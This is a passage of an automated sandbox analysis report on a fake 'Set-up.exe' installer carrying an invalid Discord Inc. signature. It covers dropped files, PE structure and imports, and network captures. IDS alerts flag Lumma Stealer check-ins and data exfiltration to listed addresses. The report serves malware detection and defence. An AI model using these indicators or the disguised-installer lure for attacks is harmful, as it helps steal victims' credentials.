SHA-512:	CB8944F4F031B492789BF9712552DEC1EF0EC9775E0A859BBFD95BE00EA516B9B10CB31E9876FAB5B2D8157E29B2DFDA434386D6F6939C5490CAE2FCB5078CAE
Malicious:	false
Preview:	...%.'.-.r.y.nv...@....P. .Q....Q.. .a.y...C`......q...U.d"......"3....e..j....Y..c;r.`...17C.q...#..i..u.....H....@.V.......rUov.Kc...3B..@d...tG..vdZdr..g9..B.4....rV....2l-W..#?....W..y.!...~..2.En3\..P?o&.C..k..4.0......._og)nO......P].]..35..g.t...}>C......8.W...Q..b....E.^....eP.^.VQ.5...q....7D..:..%...q...4a.g....I'.K...}...........X.4...4.1......&.1=.......3...$gI%vG....N....j..23..1.J.Qw.:.Q6.v.....U..e..H.~e.;..m....Ql...\.U.}.s....m........._D{.x~C........'".[...o.L...t_~'..k..."..s3DV...-../..:....'.s...+.I....W....2...w.P...`F...\| ...H...m.u.xe..G...... .X...s(....=.KQ.....=..>3.y$...t...?...6....F.........w....c.;.R..c..#.x..a.$.../X2O.....Z....Ta..{2..+5......RC..J...:.f.;.3...,..{./..)b.j...w.]..M..GLcy..P......T.C&;`CJ4`..".{.=........zXf.....m...{H..K'..7.H.Z.......h..x....>5.M9t.4....".Co.L)......'....C......A...N[..p.?......'R.......(,=..g...>.(..N..S.]2f.y.B8.SI.^..%q\,..X. R.lD.E.2=...y..c.~

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Sk

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	111616
Entropy (8bit):	6.277755922133893
Encrypted:	false
SSDEEP:	3072:QZg5PXPeiR6MKkjGWoUlJUPdgQa8Bp/LxyA3laWZ:QK5vPeDkjGgQaE/lz
MD5:	098A60CB2EA143DB473AA4BA07CF2DDB
SHA1:	F18D6CCAE4E139CB2FFC6A2C0F16385408F4E8A0
SHA-256:	908B55DE345DBF32EC8181925815D81A18CE33320990993493A0676498B7F592
SHA-512:	EB10C6C0DF986351BEDF36E35CAAEB2ABC6749E7921588D8C374888770B61803DB1FB023D02C1A6F9B11A8380A2F9BACDA4D148BABCB8A27D539E657390CC725
Malicious:	false
Preview:	....................................................................................................................................................................t.M.....hi'D......Y.hs'D......Y..r...hx'D......Y..\|X..h}'D......Y.Q.I...h.'D.....Y.0$M.Q.@..0$M.P.=B..h.'D.....Y...C..h.'D.....Y.....h.'D..}...Y..+O..h.'D..l...Y..!...h.'D..[...Y.45M....h.'D..E...Y.U....SVW.}.....e....E..E..w..E..E.E.E............v..G..H..z....E....v..G..H..g....E....v..O..I..T....E...v..O..I..A....E...v..O..I.......E...v..O..I.......E..O..1...?}...u..N..u..u..u..u..u..u..1........p.....u.........F.....3._..^[....U..V.u.3.W.~....p....N.j.j.P..j.j....Pj......u..........>3._.F.....^]...SV..3.Wj._.N...N(...^..^..~..^..^..^ .^$.4......f.^8.Nl.F:..^<.^@.FL.FP.FT.FX.F\.F`.Fd.....j....................F\|U............[............u......3........................l.....p.....t.....x.....\|...........................f.............................................................._......^[.U..SV

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Stories

Download File

Process:	C:\Users\user\Desktop\'Set-up.exe
File Type:	data
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	7.997344277756781
Encrypted:	true
SSDEEP:	1536:9ABet9+rMJmiu6yQjovsOMxkaQ5p9aMOMwbmL36vTcz4BKNziKcomH1hqq:9zsMcN6y0o8xkaQhpymLKvTSVcDhqq
MD5:	2B4E748BEF9F2357D0FF96C2A48A707E
SHA1:	FE01D0B8A6DF9FB298AFEE2B7A8119890394B4C5
SHA-256:	AC7E540A3BFA0F2C3DD596614C72A6AD1ED3492F66462086FF9A86B5A00BB5E4
SHA-512:	EDA25B10E599EF2DB88B0F53A0BD836EFDC74314B523F600ABAA40C17F8C065DA1967BE7073ADAC15891B6D5E37F1291B0DCCEE9F05099518E6AA558CB0CB8B4
Malicious:	false
Preview:	B.M..x;L.%....V....T.\|K.h..9..8..J.....+v..+Q...@G.\|t..YY..%.u..e.FI.....Wm[."...22.W!.~1.S}... ...NWC..C$1...I.lx!..4...]...V.8.....x....n... o..$.&}.......i......j....;.f..7.U.<c.w7.x...>.M.!la.J.n.p..^....C-...fg`......\|.Q.@.<O........u.h..^K.T....p.o..I.5D..q/.v#+.....vY.(..u..w...y0[.S/..mG2...zn..`.^N..t.R....S...I..-h..a.....i.I4..kI.,.M..#....e.G.d...p...../n.So..6.8....s..^..4..jn.w...Q...^..e.gn,p=.2..s.p.[......)..`w.<..%.....K.jx........S.)..7.\|.eke#S..R.....}N.....z{5Q.4).....sIr.......\.z.Y.....N.B.@.0.#T...U.......X_XSF..9hi...&Y.$.H......V.....,.,1...Z.e^..G.F.A......<E~.. ....\|Q7.n....v...DWU........E.3......<......Jw...b..N@.^S'(.]1.$.{m..oIX.a...1..,.&+%..P..h... .#..Z.xl..E.p1.=...O.c.&.f\|...!..&.:....T.o=._..hD.0J%...v...h...#......F...s1........c;.].....c....fE=9....n........jH8u]......m.8}%......= =ET.)?\.^.....)..\|d.f...y.P..2}...@.........Y.......&H...pC.....`.o.$.B..E..`Z.....".e.p)9g.....'........._7S.\...P.*h..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Thats

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	93184
Entropy (8bit):	6.6749255986542995
Encrypted:	false
SSDEEP:	1536:jaSXL21rKoUn9r5C03Eq30BcrTrhCX4aVmoJiKwtk2ukC5HRu+OoQjz7nts/M261:jtNPnj0nEoXnmowS2u5hVOoQ7t8T6pv
MD5:	C350429B49E4758264AF8B91C3378DB1
SHA1:	63BF228482985FC358FAD824D2C2AFB0EE1F4895
SHA-256:	FBB96260A900A675A3F3949FF61F295789EF6592DC39FC910F220F1438DB0277
SHA-512:	0EC46C3C6EAECD66CA86299E2A369E99F9D8144772010D81D62217F3BB805E2EE385C990F585F18A9AB21C7BAAF1652404AD81542BED82817635FF3F428FC80C
Malicious:	false
Preview:	....j}Yf;.t..E...O...........9]..........(..=...........E...I..............@.E...G...].j.[f;..._......ML....R...ja.....Xf9E.r... ..A..........7+..E.....\|..!....E...................f;..........ML..........G.f;..........ML..........G.f;..........ML..........G.f;..........ML........j....E.a...Z........f;E.r... ..A..........7+.....u.U.......%.........;........E...L....K...f.9{t..E...Q....7.....G...j}.M.Yf;........M...j7Xj0Z.]..f;.rJ...f;.wB........u.;.t$...4..E.....%.........;.v..E..........j7..f;.Xs.j7X...9].t'f;.......f;..........j7.....f;.Xs......j}Xf;........E...P....y....E...%....b....E.f9G...^....O.........N....E...%....@....K......A.......9.....C...C.........{......3.9B..........K.....+......}r......f;.w................]..U..}..M..+........;...C.....n......wf.K....f;E.t.f;E.t.f;E.t.f;E...;...jw_..A...Af99t..u..}.....u.R.u..U....................1L..U...C.z....U.E.P.E....p........].YY.........u..>...u..}..U..F..U....U......%....E..u....Z..E...n..p..........G........

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	1.1510207563435464
Encrypted:	false
SSDEEP:	3:Nlllul9kLZ:NllUG
MD5:	087D847469EB88D02E57100D76A2E8E4
SHA1:	A2B15CEC90C75870FDAE3FEFD9878DD172319474
SHA-256:	81EB9A97215EB41752F6F4189343E81A0D5D7332E1646A24750D2E08B4CAE013
SHA-512:	4682F4457C1136F84C10ACFE3BD114ACF3CCDECC1BDECC340A5A36624D93A4CB3D262B3A6DD3523C31E57C969F04903AB86BE3A2C6B07193BF08C00962B33727
Malicious:	false
Preview:	@...e.................................,..............@..........

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3mfilfz0.a24.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_42gt50ox.4jv.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	4.657892425402063
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	'Set-up.exe
File size:	73'410'924 bytes
MD5:	9284c1e1be5769dc80792308a978330a
SHA1:	4f4bc4ba852fc6e17e1621d69d16167add1ab138
SHA256:	66e6f6875a1bc0e6aef2be9b6f4577c8245ca3b4ead13a4e3f8d6e9248c03843
SHA512:	cbd834c2f8b92bf0fa51b0f7f0d76e1d609536c8a09cb0a39770b8af547d8979c8bc07eed23dff229363a3f1681997541eea743370fdbb8c50e9da6baebe79b6
SSDEEP:	24576:JQobnzB8GlDWZzHXrRls6j4+CM+lFkDHZ0vtQ34nS/DWHOk0L:beRHRaamvyJUDg
TLSH:	E2F78C72A36831498C474EAED6432F13371A2118D437B668F778C12FB1A96BDD14EE1E
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L...X\|.N.................n.......B...8.....

File Icon


Icon Hash:	ccaca4929a9e9ec0

Static PE Info

General

Entrypoint:	0x403883
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x4E807C58 [Mon Sep 26 13:21:28 2011 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	be41bf7b8cc010b614bd36bbca606973

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
Signature Validation Error:	The digital signature of the object did not verify
Error Number:	-2146869232
Not Before, Not After	24/09/2024 01:00:00 25/09/2027 00:59:59
Subject Chain	CN=Discord Inc., O=Discord Inc., L=San Francisco, S=California, C=US, SERIALNUMBER=5128862, OID.2.5.4.15=Private Organization, OID.1.3.6.1.4.1.311.60.2.1.2=Delaware, OID.1.3.6.1.4.1.311.60.2.1.3=US
Version:	3
Thumbprint MD5:	5D2A3557A29B3D769CD29535A5E3D35D
Thumbprint SHA-1:	6C7552617E892DFCA5CEB96FA2870F4F1904820E
Thumbprint SHA-256:	77E85A01A656323340749C2D61FA129C86DA12533CAC6A4FCF2C81C9D8D63A40
Serial:	0DE9CF2E718364A0062E0D83093E34D7

Entrypoint Preview

Instruction
sub esp, 000002D4h
push ebx
push ebp
push esi
push edi
push 00000020h
xor ebp, ebp
pop esi
mov dword ptr [esp+18h], ebp
mov dword ptr [esp+10h], 00409268h
mov dword ptr [esp+14h], ebp
call dword ptr [00408030h]
push 00008001h
call dword ptr [004080B4h]
push ebp
call dword ptr [004082C0h]
push 00000008h
mov dword ptr [00472EB8h], eax
call 00007F4654EC9EFBh
push ebp
push 000002B4h
mov dword ptr [00472DD0h], eax
lea eax, dword ptr [esp+38h]
push eax
push ebp
push 00409264h
call dword ptr [00408184h]
push 0040924Ch
push 0046ADC0h
call 00007F4654EC9BDDh
call dword ptr [004080B0h]
push eax
mov edi, 004C30A0h
push edi
call 00007F4654EC9BCBh
push ebp
call dword ptr [00408134h]
cmp word ptr [004C30A0h], 0022h
mov dword ptr [00472DD8h], eax
mov eax, edi
jne 00007F4654EC74CAh
push 00000022h
pop esi
mov eax, 004C30A2h
push esi
push eax
call 00007F4654EC98A1h
push eax
call dword ptr [00408260h]
mov esi, eax
mov dword ptr [esp+1Ch], esi
jmp 00007F4654EC7553h
push 00000020h
pop ebx
cmp ax, bx
jne 00007F4654EC74CAh
add esi, 02h
cmp word ptr [esi], bx

Rich Headers

Programming Language:

[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[ C ] VS2010 SP1 build 40219
[RES] VS2010 SP1 build 40219
[LNK] VS2010 SP1 build 40219

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x9b34	0xb4	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xf4000	0xf8ea	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x45ffff4	0x2978
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x7a000	0x964	.ndata
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8000	0x2d0	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x6dae	0x6e00	00499a6f70259150109c809d6aa0e6ed	False	0.6611150568181818	data	6.508529563136936	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8000	0x2a62	0x2c00	07990aaa54c3bc638bb87a87f3fb13e3	False	0.3526278409090909	data	4.390535020989255	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xb000	0x67ebc	0x200	014871d9a00f0e0c8c2a7cd25606c453	False	0.203125	data	1.4308602597540492	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x73000	0x81000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0xf4000	0xf8ea	0xfa00	1f7f55e81b2b10f64ebbfa7954d22036	False	0.90203125	data	7.610681751429392	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x104000	0xf32	0x1000	247c5e2abfb613ca239f9c85fc03bb74	False	0.60009765625	data	5.519539968850433	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0xf4250	0x8c35	PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced	English	United States	1.0005850722982197
RT_ICON	0xfce88	0x28cc	PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced	English	United States	1.001053236307928
RT_ICON	0xff754	0x2668	Device independent bitmap graphic, 48 x 96 x 32, image size 9792	English	United States	0.6304922701383239
RT_ICON	0x101dbc	0x1128	Device independent bitmap graphic, 32 x 64 x 32, image size 4352	English	United States	0.6871584699453552
RT_ICON	0x102ee4	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States	0.8421985815602837
RT_DIALOG	0x10334c	0x100	data	English	United States	0.5234375
RT_DIALOG	0x10344c	0x11c	data	English	United States	0.6056338028169014
RT_DIALOG	0x103568	0x60	data	English	United States	0.7291666666666666
RT_GROUP_ICON	0x1035c8	0x4c	data	English	United States	0.8026315789473685
RT_MANIFEST	0x103614	0x2d6	XML 1.0 document, ASCII text, with very long lines (726), with no line terminators	English	United States	0.5647382920110193

Imports

DLL	Import
KERNEL32.dll	SetFileTime, CompareFileTime, SearchPathW, GetShortPathNameW, GetFullPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, CreateDirectoryW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, SetErrorMode, lstrcpynA, CloseHandle, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, LoadLibraryW, CreateProcessW, lstrcmpiA, CreateFileW, GetTempFileNameW, lstrcatW, GetProcAddress, LoadLibraryA, GetModuleHandleA, OpenProcess, lstrcpyW, GetVersionExW, GetSystemDirectoryW, GetVersion, lstrcpyA, RemoveDirectoryW, lstrcmpA, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GlobalFree, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, WideCharToMultiByte, lstrlenA, MulDiv, WriteFile, ReadFile, MultiByteToWideChar, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, lstrlenW
USER32.dll	GetAsyncKeyState, IsDlgButtonChecked, ScreenToClient, GetMessagePos, CallWindowProcW, IsWindowVisible, LoadBitmapW, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, TrackPopupMenu, GetWindowRect, AppendMenuW, CreatePopupMenu, GetSystemMetrics, EndDialog, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, DialogBoxParamW, CheckDlgButton, CreateWindowExW, SystemParametersInfoW, RegisterClassW, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharNextA, CharUpperW, CharPrevW, wvsprintfW, DispatchMessageW, PeekMessageW, wsprintfA, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, CharNextW, GetClassInfoW, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, FindWindowExW
GDI32.dll	SetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor, SelectObject
SHELL32.dll	SHBrowseForFolderW, SHGetPathFromIDListW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW, SHGetSpecialFolderLocation
ADVAPI32.dll	RegEnumKeyW, RegOpenKeyExW, RegCloseKey, RegDeleteKeyW, RegDeleteValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumValueW
COMCTL32.dll	ImageList_AddMasked, ImageList_Destroy, ImageList_Create
ole32.dll	CoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
VERSION.dll	GetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-07T14:51:47.479423+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49737	104.21.25.52	443	TCP
2025-01-07T14:51:47.985484+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49737	104.21.25.52	443	TCP
2025-01-07T14:51:47.985484+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49737	104.21.25.52	443	TCP
2025-01-07T14:51:48.496774+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49738	104.21.25.52	443	TCP
2025-01-07T14:51:48.973354+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.4	49738	104.21.25.52	443	TCP
2025-01-07T14:51:48.973354+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49738	104.21.25.52	443	TCP
2025-01-07T14:51:49.732987+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49739	104.21.25.52	443	TCP
2025-01-07T14:51:51.050486+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49740	104.21.25.52	443	TCP
2025-01-07T14:51:52.238124+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49741	104.21.25.52	443	TCP
2025-01-07T14:51:53.801479+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49742	104.21.25.52	443	TCP
2025-01-07T14:51:54.808457+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49743	104.21.25.52	443	TCP
2025-01-07T14:51:55.398017+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.4	49743	104.21.25.52	443	TCP
2025-01-07T14:51:55.858952+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49744	104.21.25.52	443	TCP
2025-01-07T14:51:56.592665+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49744	104.21.25.52	443	TCP
2025-01-07T14:51:57.472449+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49745	185.161.251.21	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 7, 2025 14:51:46.989833117 CET	49737	443	192.168.2.4	104.21.25.52
Jan 7, 2025 14:51:46.989881039 CET	443	49737	104.21.25.52	192.168.2.4
Jan 7, 2025 14:51:46.989970922 CET	49737	443	192.168.2.4	104.21.25.52
Jan 7, 2025 14:51:47.014497042 CET	49737	443	192.168.2.4	104.21.25.52
Jan 7, 2025 14:51:47.014527082 CET	443	49737	104.21.25.52	192.168.2.4
Jan 7, 2025 14:51:47.479281902 CET	443	49737	104.21.25.52	192.168.2.4
Jan 7, 2025 14:51:47.479423046 CET	49737	443	192.168.2.4	104.21.25.52
Jan 7, 2025 14:51:47.483748913 CET	49737	443	192.168.2.4	104.21.25.52
Jan 7, 2025 14:51:47.483761072 CET	443	49737	104.21.25.52	192.168.2.4
Jan 7, 2025 14:51:47.484000921 CET	443	49737	104.21.25.52	192.168.2.4
Jan 7, 2025 14:51:47.527179956 CET	49737	443	192.168.2.4	104.21.25.52
Jan 7, 2025 14:51:47.576921940 CET	49737	443	192.168.2.4	104.21.25.52
Jan 7, 2025 14:51:47.576950073 CET	49737	443	192.168.2.4	104.21.25.52
Jan 7, 2025 14:51:47.577083111 CET	443	49737	104.21.25.52	192.168.2.4
Jan 7, 2025 14:51:47.985480070 CET	443	49737	104.21.25.52	192.168.2.4
Jan 7, 2025 14:51:47.985570908 CET	443	49737	104.21.25.52	192.168.2.4
Jan 7, 2025 14:51:47.985630989 CET	49737	443	192.168.2.4	104.21.25.52
Jan 7, 2025 14:51:47.997978926 CET	49737	443	192.168.2.4	104.21.25.52
Jan 7, 2025 14:51:47.998012066 CET	443	49737	104.21.25.52	192.168.2.4
Jan 7, 2025 14:51:47.998025894 CET	49737	443	192.168.2.4	104.21.25.52
Jan 7, 2025 14:51:47.998034000 CET	443	49737	104.21.25.52	192.168.2.4
Jan 7, 2025 14:51:48.011390924 CET	49738	443	192.168.2.4	104.21.25.52
Jan 7, 2025 14:51:48.011436939 CET	443	49738	104.21.25.52	192.168.2.4
Jan 7, 2025 14:51:48.011538029 CET	49738	443	192.168.2.4	104.21.25.52
Jan 7, 2025 14:51:48.012582064 CET	49738	443	192.168.2.4	104.21.25.52
Jan 7, 2025 14:51:48.012594938 CET	443	49738	104.21.25.52	192.168.2.4
Jan 7, 2025 14:51:48.496664047 CET	443	49738	104.21.25.52	192.168.2.4
Jan 7, 2025 14:51:48.496773958 CET	49738	443	192.168.2.4	104.21.25.52
Jan 7, 2025 14:51:48.498018980 CET	49738	443	192.168.2.4	104.21.25.52
Jan 7, 2025 14:51:48.498029947 CET	443	49738	104.21.25.52	192.168.2.4
Jan 7, 2025 14:51:48.498262882 CET	443	49738	104.21.25.52	192.168.2.4
Jan 7, 2025 14:51:48.499474049 CET	49738	443	192.168.2.4	104.21.25.52
Jan 7, 2025 14:51:48.499495983 CET	49738	443	192.168.2.4	104.21.25.52
Jan 7, 2025 14:51:48.499542952 CET	443	49738	104.21.25.52	192.168.2.4
Jan 7, 2025 14:51:48.973368883 CET	443	49738	104.21.25.52	192.168.2.4
Jan 7, 2025 14:51:48.973417044 CET	443	49738	104.21.25.52	192.168.2.4
Jan 7, 2025 14:51:48.973447084 CET	443	49738	104.21.25.52	192.168.2.4
Jan 7, 2025 14:51:48.973479033 CET	49738	443	192.168.2.4	104.21.25.52
Jan 7, 2025 14:51:48.973509073 CET	443	49738	104.21.25.52	192.168.2.4
Jan 7, 2025 14:51:48.973551035 CET	49738	443	192.168.2.4	104.21.25.52
Jan 7, 2025 14:51:48.973558903 CET	443	49738	104.21.25.52	192.168.2.4
Jan 7, 2025 14:51:48.973907948 CET	443	49738	104.21.25.52	192.168.2.4
Jan 7, 2025 14:51:48.973943949 CET	49738	443	192.168.2.4	104.21.25.52
Jan 7, 2025 14:51:48.973952055 CET	443	49738	104.21.25.52	192.168.2.4
Jan 7, 2025 14:51:48.974252939 CET	443	49738	104.21.25.52	192.168.2.4
Jan 7, 2025 14:51:48.974282980 CET	443	49738	104.21.25.52	192.168.2.4
Jan 7, 2025 14:51:48.974297047 CET	49738	443	192.168.2.4	104.21.25.52
Jan 7, 2025 14:51:48.974303961 CET	443	49738	104.21.25.52	192.168.2.4
Jan 7, 2025 14:51:48.974344969 CET	49738	443	192.168.2.4	104.21.25.52
Jan 7, 2025 14:51:48.974350929 CET	443	49738	104.21.25.52	192.168.2.4
Jan 7, 2025 14:51:48.974992990 CET	443	49738	104.21.25.52	192.168.2.4
Jan 7, 2025 14:51:48.975039959 CET	49738	443	192.168.2.4	104.21.25.52
Jan 7, 2025 14:51:48.975049973 CET	443	49738	104.21.25.52	192.168.2.4
Jan 7, 2025 14:51:48.975085020 CET	443	49738	104.21.25.52	192.168.2.4
Jan 7, 2025 14:51:48.975127935 CET	49738	443	192.168.2.4	104.21.25.52
Jan 7, 2025 14:51:48.975191116 CET	49738	443	192.168.2.4	104.21.25.52
Jan 7, 2025 14:51:48.975209951 CET	443	49738	104.21.25.52	192.168.2.4
Jan 7, 2025 14:51:48.975225925 CET	49738	443	192.168.2.4	104.21.25.52
Jan 7, 2025 14:51:48.975229979 CET	443	49738	104.21.25.52	192.168.2.4
Jan 7, 2025 14:51:49.253493071 CET	49739	443	192.168.2.4	104.21.25.52
Jan 7, 2025 14:51:49.253561020 CET	443	49739	104.21.25.52	192.168.2.4
Jan 7, 2025 14:51:49.253633976 CET	49739	443	192.168.2.4	104.21.25.52
Jan 7, 2025 14:51:49.253950119 CET	49739	443	192.168.2.4	104.21.25.52
Jan 7, 2025 14:51:49.253963947 CET	443	49739	104.21.25.52	192.168.2.4
Jan 7, 2025 14:51:49.732917070 CET	443	49739	104.21.25.52	192.168.2.4
Jan 7, 2025 14:51:49.732986927 CET	49739	443	192.168.2.4	104.21.25.52
Jan 7, 2025 14:51:49.734260082 CET	49739	443	192.168.2.4	104.21.25.52
Jan 7, 2025 14:51:49.734272003 CET	443	49739	104.21.25.52	192.168.2.4
Jan 7, 2025 14:51:49.734508991 CET	443	49739	104.21.25.52	192.168.2.4
Jan 7, 2025 14:51:49.735783100 CET	49739	443	192.168.2.4	104.21.25.52
Jan 7, 2025 14:51:49.735941887 CET	49739	443	192.168.2.4	104.21.25.52
Jan 7, 2025 14:51:49.735970974 CET	443	49739	104.21.25.52	192.168.2.4
